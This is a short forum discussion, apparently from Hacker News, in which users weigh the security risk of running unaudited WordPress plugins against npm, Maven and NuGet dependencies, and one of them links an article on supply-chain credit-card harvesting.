[jmnicolas]

It's what's worrying with running WordPress plugins: you mean I'm downloading some PHP code written by somebody unknown and this code executes whatever it wants on my server???!!!

It seems I'm the only one that is bothered by this.

And no I don't at the time nor the skill to audit everything or to use a static site like Hugo.

[csunbird]

What is the difference between downloading a wordpress plugin and running it in your server and downloading a jar from maven/a js package from npm and running it?

[marcus_holmes]

Nothing. These are also very, very dangerous and expose your site to supply-chain attacks.

The article linked to here [0] which is a must-read for everyone who feels that adding a dependency is safe.

[0] https://medium.com/hackernoon/im-harvesting-credit-card-numb...

[jmnicolas]

I work with C#, most (all?) Nugget packages I download are open source, which isn't the case of a lot of WP plugins that are obfuscated.

They're also centrally managed by Microsoft, so if there was a problem with one package they could kick it out of the Nugget repo.

But in the end you're right, it's mostly a matter of trust and finger crossed.

[remram]

Isn't that what WordPress is in the first place?

[jmnicolas]

Absolutely, but it's still scary nonetheless! The problem is that there's not many viable alternative to WP.

[remram]

Isn't any piece of software "some <lang> code written by somebody unknown and this code executes whatever it wants on your server"?